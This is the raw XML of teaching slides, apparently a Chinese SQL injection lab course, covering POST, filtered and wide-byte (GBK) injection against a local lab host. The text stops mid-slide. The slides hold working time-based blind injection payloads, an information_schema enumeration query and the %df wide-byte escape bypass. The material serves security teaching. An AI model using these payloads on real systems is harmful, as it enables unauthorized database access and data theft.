          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="303747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-04_ post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A782634D-0432-4443-82D4-24025F521E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193964" y="886691"/>
            <a:ext cx="11804071" cy="5805054"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fadsfadfdasfasdfasfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘ or if(length(database())&gt;1,1,sleep(5))# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过返回信息来判断当前数据库长度，和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基本相似</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fadsfadfdasfasdfasfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘ or if(((select length(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> limit 0,1)&gt;1),1,sleep(5))# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也可通过这种遍历的方法判断所有的数据库。 速度较慢，推荐使用脚本。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接下来的使用方法就是和以前相同了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2342349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2CDF92-7B9A-4EE0-B3CE-F8BE9E318E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="386875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-05_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3F3FCB6-FD38-402A-9C89-BB445F8B33FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在搜索页面输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>点击搜索，发现了报错。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=‘# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时返回正常页面，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=’ or sleep(3) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在延时</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyWordName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=‘ or if(length(database())&gt;1,1,sleep(5))#  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>好像并没有进行过滤注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关一样。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AC1BE6F-FAB6-4658-9C06-09F78C849D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854900" y="4931164"/>
            <a:ext cx="2208935" cy="1720072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1757143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66AE25-A2EE-434B-A48B-AD593048F0A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="650111"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考必读</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D217CE44-0BAE-4590-A4F7-4CE65B031259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="1870365"/>
            <a:ext cx="10556794" cy="3920836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本次分享的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中很多教程均参考至互联网，而且只是作为教学使用，请勿商用和其他非法用途，若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中存在错误等信息，请和我联系：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>crow_821@163.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>， 或者是在微信公众号：乌鸦安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，给我留言，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3139354876</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。我会第一时间进行修改！如果你在学习中有任何的问题和困难，也可以和我联系，我告诉你我遇到困难的时候是如何退缩的！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>哈哈，玩笑话，有问题可以发我邮箱或者是留言，我看到之后都会答复的！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>免费分享不易，难免有错，请多多指教！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1456965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C1609-FD81-466E-9E93-A587B8C9AF96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="386875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>宽字节  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841CCE61-EFBC-4CE8-BC3F-DCAFEFB966B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207818" y="983673"/>
            <a:ext cx="11651673" cy="5666509"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考文章： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/helloc0de/article/details/76180190</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/heiseweiye/article/details/82723478</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>宽字节： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GB2312</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GBK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GB18030</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BIG5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Shift_JIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等这些都是常说的宽字节，实际上只有两字节。宽字节带来的安全问题主要是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的现象，即将两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符误认为是一个宽字节字符。  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中文、韩文、日文等均存在宽字节，英文默认都是一个字节。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的时候，当设置“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>set  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>character_set_client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>gbk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时会导致一个编码转换的问题。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例子：   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id= 1’   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    处理  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1 \’       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行编码   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1%5c%27         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>带入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id = \’ and XXXX  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时无法完成注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                id=1%df’  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>处理 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1%df\’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行编码  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1%df%5c%27   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>带入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id =1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>運</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ and XXX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时存在宽字节注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="600034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20424-844C-4C43-8F2A-FABA9AD2AAD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="276038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-06_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>宽字节注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72CE2D9B-9233-43EA-9760-B3E16BDAC46A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166255" y="900545"/>
            <a:ext cx="11804072" cy="5818910"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>width_byte_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时返回正常，由题目知道是宽字节注入，所以直接引入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%df’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
